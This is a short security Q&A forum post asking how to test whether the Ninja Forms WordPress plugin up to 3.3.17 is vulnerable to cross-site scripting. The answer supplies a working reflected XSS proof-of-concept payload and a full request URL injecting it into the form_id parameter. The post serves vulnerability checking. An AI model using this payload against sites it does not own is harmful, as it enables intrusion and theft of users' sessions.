Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

+1 vote
Ninja Forms <= 3.3.17 is vulnerable to Unauthenticated Cross-Site Scripting. How can I check this?
by

1 Answer

0 votes

You can check your site is vulnerable or not by inserting the payload 

"><script>alert(document.domain);</script>

in the "form_id" parameter like this.

http://wordpresssite/wp-admin/edit.php?post_status=all&post_type=nf_sub&form_id=1"><script>alert(document.domain);</script>&nf_form_filter&paged=1

by (277 points)
...